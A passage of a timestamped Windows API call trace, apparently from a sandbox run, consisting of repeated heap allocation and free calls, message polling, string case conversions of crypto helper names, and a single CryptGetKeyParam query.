(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd484) returned 0x935008 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0039.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.085] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.085] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.086] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.087] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.088] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.088] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.092] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.092] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 